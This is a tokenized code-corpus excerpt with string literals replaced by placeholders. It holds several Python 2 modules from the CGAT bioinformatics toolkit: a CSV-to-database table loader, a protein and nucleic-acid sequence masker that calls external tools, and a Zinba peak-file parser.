group ( <NUM_LIT:1> ) ) <EOL> logger . debug ( '<STR_LIT>' , x , m . group ( <NUM_LIT:1> ) ) <EOL> continue <EOL> finally : <EOL> f . close ( ) <EOL> if len ( seed_list ) == <NUM_LIT:0> : <EOL> logger . 
debug ( '<STR_LIT>' , x ) <EOL> continue <EOL> record_stats ( x , seed_list , counters , first_seeds , last_seeds ) <EOL> output_lines = prepare_output ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) <EOL> [ logger . info ( l ) for l in output_lines ] </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import string <EOL> import re <EOL> import time <EOL> import tempfile <EOL> import types <EOL> from CGAT import Experiment as E <EOL> from CGAT import CSV as CSV <EOL> from CGAT import IOTools as IOTools <EOL> import sqlite3 <EOL> def executewait ( dbhandle , statement , error , <EOL> retry = False , <EOL> wait = <NUM_LIT:5> , <EOL> args = ( ) ) : <EOL> '''<STR_LIT>''' <EOL> cc = dbhandle . cursor ( ) <EOL> i = <NUM_LIT:20> <EOL> while i > <NUM_LIT:0> : <EOL> try : <EOL> cc . execute ( statement , args ) <EOL> return cc <EOL> except sqlite3 . OperationalError as e : <EOL> msg = e . message <EOL> E . warn ( "<STR_LIT>" % <EOL> ( msg , statement ) ) <EOL> if not retry : <EOL> raise e <EOL> if not re . search ( "<STR_LIT>" , str ( msg ) ) : <EOL> raise e <EOL> time . sleep ( wait ) <EOL> i -= <NUM_LIT:1> <EOL> continue <EOL> break <EOL> raise sqlite3 . OperationalError ( "<STR_LIT>" ) <EOL> def quoteRow ( row , take , <EOL> map_column2type , <EOL> missing_values , <EOL> null = "<STR_LIT>" , <EOL> string_value = "<STR_LIT:%s>" ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for t in take : <EOL> v = row [ t ] <EOL> if v == "<STR_LIT>" : <EOL> d [ t ] = null <EOL> elif v in missing_values : <EOL> d [ t ] = null <EOL> elif map_column2type [ t ] in ( types . IntType , types . FloatType ) : <EOL> d [ t ] = str ( row [ t ] ) <EOL> else : <EOL> d [ t ] = string_value % row [ t ] <EOL> return d <EOL> def quoteTableName ( name , quote_char = "<STR_LIT:_>" , backend = "<STR_LIT>" ) : <EOL> if backend == "<STR_LIT>" : <EOL> if name [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> name = "<STR_LIT:_>" + name <EOL> return re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , name ) <EOL> elif backend in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if name [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> name = "<STR_LIT:_>" + name <EOL> return re . 
sub ( "<STR_LIT>" , "<STR_LIT:_>" , name ) <EOL> def createTable ( dbhandle , <EOL> error , <EOL> tablename , <EOL> options , <EOL> retry = True , <EOL> ignore_empty = True , <EOL> ignore_columns = [ ] , <EOL> rename_columns = [ ] , <EOL> lowercase = False , <EOL> ignore_duplicates = True , <EOL> indices = [ ] , <EOL> rows = None , <EOL> headers = None , <EOL> first_column = None , <EOL> existing_tables = set ( ) , <EOL> append = False ) : <EOL> if rows : <EOL> map_column2type , ignored , max_values = CSV . getMapColumn2Type ( <EOL> rows , <EOL> ignore_empty = ignore_empty , <EOL> get_max_values = True ) <EOL> if ignored : <EOL> E . info ( "<STR_LIT>" % str ( ignored ) ) <EOL> headers = map_column2type . keys ( ) <EOL> headers . sort ( ) <EOL> elif headers : <EOL> map_column2type = dict ( zip ( headers , [ None , ] * len ( headers ) ) ) <EOL> ignored = <NUM_LIT:0> <EOL> columns_to_ignore = set ( [ x . lower ( ) for x in ignore_columns ] ) <EOL> columns_to_rename = dict ( [ x . lower ( ) . split ( "<STR_LIT::>" ) <EOL> for x in rename_columns ] ) <EOL> take = [ ] <EOL> columns = [ ] <EOL> present = { } <EOL> for header_index , h in enumerate ( headers ) : <EOL> hh = h <EOL> if lowercase : <EOL> hh = string . lower ( h ) <EOL> if hh in columns_to_ignore : <EOL> continue <EOL> if hh in present : <EOL> if ignore_duplicates : <EOL> continue <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % hh ) <EOL> present [ hh ] = <NUM_LIT:1> <EOL> take . append ( h ) <EOL> if map_column2type [ h ] == int : <EOL> max_value = max_values [ h ] <EOL> if max_value > <NUM_LIT> : <EOL> t = "<STR_LIT>" <EOL> elif max_value > <NUM_LIT> : <EOL> t = "<STR_LIT>" <EOL> else : <EOL> t = "<STR_LIT>" <EOL> elif map_column2type [ h ] == float : <EOL> t = "<STR_LIT>" <EOL> else : <EOL> if h in options . indices : <EOL> t = options . index <EOL> else : <EOL> t = options . 
text <EOL> if hh == "<STR_LIT>" : <EOL> if first_column is not None and header_index == <NUM_LIT:0> : <EOL> hh = first_column <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % h ) <EOL> hh = columns_to_rename . get ( hh , hh ) <EOL> hh = re . sub ( '''<STR_LIT>''' , "<STR_LIT>" , hh ) <EOL> hh = re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , hh ) <EOL> if hh [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> hh = "<STR_LIT:_>" + hh <EOL> columns . append ( "<STR_LIT>" % ( hh , t ) ) <EOL> if not options . append : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> cc = dbhandle . cursor ( ) <EOL> statement = "<STR_LIT>" % tablename <EOL> E . debug ( statement ) <EOL> cc . execute ( statement ) <EOL> dbhandle . commit ( ) <EOL> cc . close ( ) <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> except sqlite3 . OperationalError , msg : <EOL> E . warn ( msg ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> except error , msg : <EOL> E . warn ( "<STR_LIT>" % <EOL> ( tablename , str ( msg ) ) ) <EOL> dbhandle . rollback ( ) <EOL> if not retry : <EOL> raise error ( msg ) <EOL> elif tablename in existing_tables : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> else : <EOL> break <EOL> break <EOL> statement = "<STR_LIT>" % ( <EOL> tablename , "<STR_LIT:U+002CU+0020>" . join ( columns ) ) <EOL> E . debug ( "<STR_LIT>" % ( statement ) ) <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> cc = dbhandle . cursor ( ) <EOL> cc . execute ( statement ) <EOL> cc . close ( ) <EOL> dbhandle . commit ( ) <EOL> except error , msg : <EOL> E . warn ( "<STR_LIT>" % <EOL> ( msg , statement ) ) <EOL> if not retry : <EOL> raise error ( msg ) <EOL> if not re . search ( "<STR_LIT>" , str ( msg ) ) : <EOL> raise error ( "<STR_LIT>" % ( msg , statement ) ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> break <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> return take , map_column2type , ignored <EOL> def run ( infile , options , report_step = <NUM_LIT> ) : <EOL> options . 
tablename = quoteTableName ( <EOL> options . tablename , backend = options . backend ) <EOL> if options . map : <EOL> m = { } <EOL> for x in options . map : <EOL> f , t = x . split ( "<STR_LIT::>" ) <EOL> m [ f ] = t <EOL> options . map = m <EOL> else : <EOL> options . map = { } <EOL> existing_tables = set ( ) <EOL> quick_import_separator = "<STR_LIT:\t>" <EOL> if options . database_backend == "<STR_LIT>" : <EOL> import psycopg2 <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> dbhandle = psycopg2 . connect ( options . psql_connection ) <EOL> error = psycopg2 . Error <EOL> options . null = "<STR_LIT>" <EOL> options . string_value = "<STR_LIT>" <EOL> options . text = "<STR_LIT>" <EOL> options . index = "<STR_LIT>" <EOL> if options . insert_quick : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif options . database_backend == "<STR_LIT>" : <EOL> import MySQLdb <EOL> dbhandle = MySQLdb . connect ( host = options . database_host , <EOL> user = options . database_username , <EOL> passwd = options . database_password , <EOL> port = options . database_port , <EOL> db = options . database_name ) <EOL> error = Exception <EOL> options . null = "<STR_LIT>" <EOL> options . string_value = "<STR_LIT:%s>" <EOL> options . text = "<STR_LIT>" <EOL> options . index = "<STR_LIT>" <EOL> if options . insert_quick : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif options . backend == "<STR_LIT>" : <EOL> import sqlite3 <EOL> dbhandle = sqlite3 . connect ( options . database_name ) <EOL> try : <EOL> os . chmod ( options . database_name , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError , msg : <EOL> E . warn ( "<STR_LIT>" % msg ) <EOL> dbhandle . text_factory = str <EOL> error = sqlite3 . OperationalError <EOL> options . insert_many = True <EOL> options . null = None <EOL> options . text = "<STR_LIT>" <EOL> options . index = "<STR_LIT>" <EOL> options . string_value = "<STR_LIT:%s>" <EOL> statement = "<STR_LIT>" <EOL> cc = executewait ( dbhandle , statement , error , options . 
retry ) <EOL> existing_tables = set ( [ x [ <NUM_LIT:0> ] for x in cc ] ) <EOL> cc . close ( ) <EOL> quick_import_statement = "<STR_LIT>" % ( options . database , options . tablename ) <EOL> quick_import_separator = "<STR_LIT:|>" <EOL> if options . header is not None : <EOL> options . header = [ x . strip ( ) for x in options . header . split ( "<STR_LIT:U+002C>" ) ] <EOL> if options . utf : <EOL> reader = CSV . UnicodeDictReader ( infile , <EOL> dialect = options . dialect , <EOL> fieldnames = options . header ) <EOL> else : <EOL> reader = CSV . DictReader ( infile , <EOL> dialect = options . dialect , <EOL> fieldnames = options . header ) <EOL> if options . replace_header : <EOL> try : <EOL> reader . next ( ) <EOL> except StopIteration : <EOL> pass <EOL> E . info ( "<STR_LIT>" % options . guess_size ) <EOL> rows = [ ] <EOL> for row in reader : <EOL> if None in row : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % row ) <EOL> try : <EOL> rows . append ( IOTools . convertDictionary ( row , map = options . map ) ) <EOL> except TypeError , msg : <EOL> E . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( msg , str ( row ) ) ) <EOL> except ValueError , msg : <EOL> E . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( msg , str ( row ) ) ) <EOL> if len ( rows ) >= options . guess_size : <EOL> break <EOL> E . info ( "<STR_LIT>" % len ( rows ) ) <EOL> E . info ( "<STR_LIT>" ) <EOL> if len ( rows ) == <NUM_LIT:0> : <EOL> if options . allow_empty : <EOL> if not reader . fieldnames : <EOL> E . warn ( "<STR_LIT>" ) <EOL> else : <EOL> take , map_column2type , ignored = createTable ( <EOL> dbhandle , <EOL> error , <EOL> options . tablename , <EOL> options , <EOL> retry = options . retry , <EOL> headers = reader . fieldnames , <EOL> ignore_empty = options . ignore_empty , <EOL> ignore_columns = options . ignore_columns , <EOL> rename_columns = options . rename_columns , <EOL> lowercase = options . lowercase , <EOL> ignore_duplicates = options . 
ignore_duplicates , <EOL> indices = options . indices , <EOL> first_column = options . first_column , <EOL> existing_tables = existing_tables , <EOL> append = options . append ) <EOL> E . info ( "<STR_LIT>" ) <EOL> return <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> take , map_column2type , ignored = createTable ( <EOL> dbhandle , <EOL> error , <EOL> options . tablename , <EOL> options , <EOL> rows = rows , <EOL> retry = options . retry , <EOL> headers = reader . fieldnames , <EOL> ignore_empty = options . ignore_empty , <EOL> ignore_columns = options . ignore_columns , <EOL> rename_columns = options . rename_columns , <EOL> lowercase = options . lowercase , <EOL> ignore_duplicates = options . ignore_duplicates , <EOL> indices = options . indices , <EOL> first_column = options . first_column , <EOL> existing_tables = existing_tables , <EOL> append = options . append ) <EOL> def row_iter ( rows , reader ) : <EOL> for row in rows : <EOL> yield quoteRow ( row , take , map_column2type , <EOL> options . missing_values , <EOL> null = options . null , <EOL> string_value = options . string_value ) <EOL> for data in reader : <EOL> yield quoteRow ( IOTools . convertDictionary ( data , map = options . map ) , <EOL> take , <EOL> map_column2type , <EOL> options . missing_values , <EOL> null = options . null , <EOL> string_value = options . string_value ) <EOL> ninput = <NUM_LIT:0> <EOL> E . info ( "<STR_LIT>" ) <EOL> if options . insert_quick : <EOL> E . info ( "<STR_LIT>" ) <EOL> outfile , filename = tempfile . mkstemp ( ) <EOL> E . debug ( "<STR_LIT>" % filename ) <EOL> for d in row_iter ( rows , reader ) : <EOL> ninput += <NUM_LIT:1> <EOL> os . write ( outfile , quick_import_separator . join ( <EOL> [ str ( d [ x ] ) for x in take ] ) + "<STR_LIT:\n>" ) <EOL> if ninput % report_step == <NUM_LIT:0> : <EOL> E . info ( "<STR_LIT>" % ninput ) <EOL> os . close ( outfile ) <EOL> statement = quick_import_statement % filename <EOL> E . 
debug ( statement ) <EOL> while <NUM_LIT:1> : <EOL> retcode = E . run ( statement , cwd = os . getcwd ( ) , close_fds = True ) <EOL> if retcode != <NUM_LIT:0> : <EOL> E . warn ( "<STR_LIT>" % statement ) <EOL> if not options . retry : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % statement ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> break <EOL> os . remove ( filename ) <EOL> for column in take : <EOL> executewait ( dbhandle , <EOL> "<STR_LIT>" % ( <EOL> options . tablename , column , column ) , <EOL> error , <EOL> options . retry ) <EOL> elif options . insert_many : <EOL> data = [ ] <EOL> for d in row_iter ( rows , reader ) : <EOL> ninput += <NUM_LIT:1> <EOL> data . append ( [ d [ x ] for x in take ] ) <EOL> if ninput % report_step == <NUM_LIT:0> : <EOL> E . info ( "<STR_LIT>" % ninput ) <EOL> statement = "<STR_LIT>" % ( <EOL> options . tablename , "<STR_LIT:U+002C>" . join ( "<STR_LIT:?>" * len ( take ) ) ) <EOL> E . info ( "<STR_LIT>" % len ( data ) ) <EOL> E . debug ( "<STR_LIT>" % statement ) <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> dbhandle . executemany ( statement , data ) <EOL> except error , msg : <EOL> E . warn ( "<STR_LIT>" % <EOL> ( msg , statement ) ) <EOL> if not options . retry : <EOL> raise error ( msg ) <EOL> if not re . search ( "<STR_LIT>" , str ( msg ) ) : <EOL> raise error ( msg ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> break <EOL> else : <EOL> statement = "<STR_LIT>" % ( options . tablename , <EOL> '<STR_LIT>' . join ( take ) ) <EOL> for d in row_iter ( rows , reader ) : <EOL> ninput += <NUM_LIT:1> <EOL> E . debug ( "<STR_LIT>" % ( statement % d ) ) <EOL> cc = executewait ( dbhandle , statement , error , <EOL> retry = options . retry , <EOL> args = d ) <EOL> cc . close ( ) <EOL> if ninput % report_step == <NUM_LIT:0> : <EOL> E . info ( "<STR_LIT>" % ninput ) <EOL> E . info ( "<STR_LIT>" ) <EOL> nindex = <NUM_LIT:0> <EOL> for index in options . 
indices : <EOL> nindex += <NUM_LIT:1> <EOL> try : <EOL> statement = "<STR_LIT>" % ( <EOL> options . tablename , nindex , options . tablename , index ) <EOL> cc = executewait ( dbhandle , statement , error , options . retry ) <EOL> cc . close ( ) <EOL> E . info ( "<STR_LIT>" % ( index ) ) <EOL> except error , msg : <EOL> E . info ( "<STR_LIT>" % ( index , msg ) ) <EOL> statement = "<STR_LIT>" % ( options . tablename ) <EOL> cc = executewait ( dbhandle , statement , error , options . retry ) <EOL> result = cc . fetchone ( ) <EOL> cc . close ( ) <EOL> noutput = result [ <NUM_LIT:0> ] <EOL> E . info ( "<STR_LIT>" % <EOL> ( ninput , noutput , len ( ignored ) ) ) <EOL> dbhandle . commit ( ) <EOL> def buildParser ( ) : <EOL> parser = E . OptionParser ( <EOL> version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . 
add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . 
set_defaults ( <EOL> map = [ ] , <EOL> dialect = "<STR_LIT>" , <EOL> database = "<STR_LIT>" , <EOL> lowercase = False , <EOL> tablename = "<STR_LIT>" , <EOL> from_zipped = False , <EOL> ignore_duplicates = False , <EOL> ignore_identical = False , <EOL> ignore_empty = False , <EOL> insert_many = False , <EOL> ignore_columns = [ ] , <EOL> rename_columns = [ ] , <EOL> header = None , <EOL> replace_header = False , <EOL> guess_size = <NUM_LIT:1000> , <EOL> report_step = <NUM_LIT> , <EOL> backend = "<STR_LIT>" , <EOL> indices = [ ] , <EOL> missing_values = ( "<STR_LIT>" , "<STR_LIT>" , ) , <EOL> insert_quick = False , <EOL> allow_empty = False , <EOL> retry = False , <EOL> utf = False , <EOL> append = False , <EOL> ) <EOL> return parser </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import subprocess <EOL> import tempfile <EOL> import string <EOL> import re <EOL> import random <EOL> from CGAT import Experiment as E <EOL> from CGAT import Genomics as Genomics <EOL> from CGAT import FastaIterator as FastaIterator <EOL> import cStringIO as StringIO <EOL> class Masker : <EOL> """<STR_LIT>""" <EOL> mExecutable = None <EOL> mOptions = "<STR_LIT>" <EOL> mHasPeptideMasking = False <EOL> mHasNucleicAcidMasking = False <EOL> soft_mask = False <EOL> def __init__ ( self ) : <EOL> pass <EOL> def getAlphabet ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> s1 = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence . lower ( ) ) <EOL> s2 = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence . lower ( ) ) <EOL> if float ( len ( s1 ) ) < ( len ( s2 ) * <NUM_LIT:0.1> ) : <EOL> alphabet = "<STR_LIT>" <EOL> if len ( sequence ) % <NUM_LIT:3> == <NUM_LIT:0> : <EOL> alphabet = "<STR_LIT>" <EOL> else : <EOL> alphabet = "<STR_LIT>" <EOL> return alphabet <EOL> def __call__ ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> sequence = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence ) <EOL> a = self . getAlphabet ( sequence ) <EOL> seq = list ( sequence ) <EOL> if len ( seq ) < <NUM_LIT:5> : <EOL> pass <EOL> elif a == "<STR_LIT>" and self . mHasPeptideMasking : <EOL> c = <NUM_LIT:0> <EOL> m = self . maskSequence ( sequence ) <EOL> if self . soft_mask : <EOL> m = re . sub ( "<STR_LIT>" , "<STR_LIT:x>" , m ) <EOL> for p , m in zip ( sequence , m ) : <EOL> if m in "<STR_LIT>" : <EOL> if p . isupper ( ) : <EOL> seq [ c ] = "<STR_LIT:X>" <EOL> else : <EOL> seq [ c ] = "<STR_LIT:x>" <EOL> c += <NUM_LIT:1> <EOL> elif a == "<STR_LIT>" and self . mHasPeptideMasking : <EOL> peptide_sequence = Genomics . TranslateDNA2Protein ( sequence ) <EOL> masked_sequence = self . maskSequence ( peptide_sequence ) <EOL> if self . soft_mask : <EOL> masked_sequence = re . 
sub ( "<STR_LIT>" , "<STR_LIT:x>" , masked_sequence ) <EOL> c = <NUM_LIT:0> <EOL> for p , m in zip ( peptide_sequence , masked_sequence ) : <EOL> if m in "<STR_LIT>" : <EOL> if p . isupper ( ) : <EOL> seq [ c : c + <NUM_LIT:3> ] = [ "<STR_LIT:N>" ] * <NUM_LIT:3> <EOL> else : <EOL> seq [ c : c + <NUM_LIT:3> ] = [ "<STR_LIT:n>" ] * <NUM_LIT:3> <EOL> c += <NUM_LIT:3> <EOL> elif a in ( "<STR_LIT>" , "<STR_LIT>" ) and self . mHasNucleicAcidMasking : <EOL> masked_sequence = self . maskSequence ( sequence ) <EOL> if self . soft_mask : <EOL> masked_sequence = re . sub ( "<STR_LIT>" , "<STR_LIT:N>" , masked_sequence ) <EOL> return masked_sequence <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % a ) <EOL> return "<STR_LIT>" . join ( seq ) <EOL> def maskSequence ( self , peptide_sequence ) : <EOL> """<STR_LIT>""" <EOL> Masker . __init__ ( self ) <EOL> outfile , filename_peptide = tempfile . mkstemp ( ) <EOL> os . write ( outfile , "<STR_LIT>" % ( peptide_sequence ) ) <EOL> os . close ( outfile ) <EOL> infile = filename_peptide <EOL> statement = self . mCommand % locals ( ) <EOL> E . debug ( "<STR_LIT>" % statement ) <EOL> s = subprocess . Popen ( statement , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , <EOL> close_fds = True ) <EOL> ( out , err ) = s . communicate ( ) <EOL> if s . returncode != <NUM_LIT:0> : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" % <EOL> ( statement , err ) ) <EOL> os . remove ( filename_peptide ) <EOL> masked_sequence = re . sub ( <EOL> "<STR_LIT>" , "<STR_LIT>" , string . join ( out . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:1> : ] , "<STR_LIT>" ) ) <EOL> return masked_sequence <EOL> def maskSequences ( self , sequences ) : <EOL> '''<STR_LIT>''' <EOL> outfile , infile = tempfile . mkstemp ( ) <EOL> for x , s in enumerate ( sequences ) : <EOL> os . write ( outfile , "<STR_LIT>" % ( x , s ) ) <EOL> os . close ( outfile ) <EOL> statement = self . mCommand % locals ( ) <EOL> E . 
debug ( "<STR_LIT>" % statement ) <EOL> s = subprocess . Popen ( statement , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , <EOL> close_fds = True ) <EOL> ( out , err ) = s . communicate ( ) <EOL> if s . returncode != <NUM_LIT:0> : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" % <EOL> ( statement , err ) ) <EOL> result = [ <EOL> x . sequence for x in FastaIterator . iterate ( StringIO . StringIO ( out ) ) ] <EOL> os . remove ( infile ) <EOL> return result <EOL> class MaskerBias ( Masker ) : <EOL> mCommand = "<STR_LIT>" <EOL> mHasPeptideMasking = True <EOL> class MaskerSeg ( Masker ) : <EOL> mCommand = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> mHasPeptideMasking = True <EOL> soft_mask = True <EOL> class MaskerDustMasker ( Masker ) : <EOL> '''<STR_LIT>''' <EOL> mCommand = "<STR_LIT>" <EOL> mHasNucleicAcidMasking = True <EOL> class MaskerRandom ( Masker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proportion = <NUM_LIT:10> , * args , ** kwargs ) : <EOL> Masker . __init__ ( self , * args , ** kwargs ) <EOL> self . mProportion = proportion / <NUM_LIT> <EOL> def __call__ ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> sequence = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence ) <EOL> a = self . getAlphabet ( sequence ) <EOL> if a == "<STR_LIT>" : <EOL> frame = <NUM_LIT:3> <EOL> else : <EOL> frame = <NUM_LIT:1> <EOL> positions = [ <EOL> x for x in range ( <NUM_LIT:0> , len ( sequence ) , frame ) if sequence [ x ] != "<STR_LIT:->" ] <EOL> to_mask = random . sample ( <EOL> positions , int ( len ( positions ) * self . mProportion ) ) <EOL> print int ( len ( positions ) * self . mProportion ) <EOL> s = list ( sequence ) <EOL> print to_mask <EOL> for x in to_mask : <EOL> for y in range ( x , x + frame ) : <EOL> s [ x ] == "<STR_LIT:x>" <EOL> return "<STR_LIT>" . join ( s ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> x = MaskerRandom ( ) <EOL> print x ( "<STR_LIT>" ) <EOL> x = MaskerDustMasker ( ) <EOL> print x . 
maskSequences ( ( "<STR_LIT>" , <EOL> "<STR_LIT>" , ) ) <EOL> def maskSequences ( sequences , masker = None ) : <EOL> '''<STR_LIT>''' <EOL> if masker in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> masker_object = MaskerDustMasker ( ) <EOL> else : <EOL> masker_object = None <EOL> if masker == "<STR_LIT>" : <EOL> masked_seq = sequences <EOL> elif masker in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> masked_seq = masker_object . maskSequences ( <EOL> [ x . upper ( ) for x in sequences ] ) <EOL> elif masker is None : <EOL> masked_seq = [ x . upper ( ) for x in sequences ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % masker ) <EOL> masked_seq = [ re . sub ( "<STR_LIT>" , "<STR_LIT:N>" , x ) for x in masked_seq ] <EOL> return masked_seq </s>
<s> '''<STR_LIT>''' <EOL> import collections <EOL> ZinbaPeak = collections . namedtuple ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def iteratePeaks ( infile ) : <EOL> '''<STR_LIT>''' <EOL> for line in infile : <EOL> if line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> if line . startswith ( "<STR_LIT:\n>" ) : <EOL> continue <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if len ( data ) != <NUM_LIT:12> : <EOL> raise ValueError ( "<STR_LIT>" % line ) <EOL> data [ <NUM_LIT:2> ] = max ( int ( data [ <NUM_LIT:2> ] ) - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> data [ <NUM_LIT:3> ] = int ( data [ <NUM_LIT:3> ] ) <EOL> data [ <NUM_LIT:5> ] = float ( data [ <NUM_LIT:5> ] ) <EOL> data [ <NUM_LIT:6> ] = max ( int ( data [ <NUM_LIT:6> ] ) - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> data [ <NUM_LIT:7> ] = int ( data [ <NUM_LIT:7> ] ) <EOL> data [ <NUM_LIT:8> ] = max ( int ( data [ <NUM_LIT:8> ] ) - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> data [ <NUM_LIT:9> ] = int ( data [ <NUM_LIT:9> ] ) <EOL> data [ <NUM_LIT:10> ] = int ( data [ <NUM_LIT:10> ] ) <EOL> data [ <NUM_LIT:11> ] = float ( data [ <NUM_LIT:11> ] ) <EOL> yield ZinbaPeak . _make ( data [ <NUM_LIT:1> : ] ) </s>
